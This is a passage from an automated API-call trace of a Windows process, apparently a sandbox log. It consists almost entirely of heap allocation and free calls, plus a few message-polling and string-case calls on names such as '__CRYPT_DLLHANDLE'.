Size=0x10) returned 0x88caf0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.581] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.581] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.581] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.582] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.582] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.583] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.584] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.584] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.584] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.587] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.587] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.588] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.589] RtlAllocateHeap 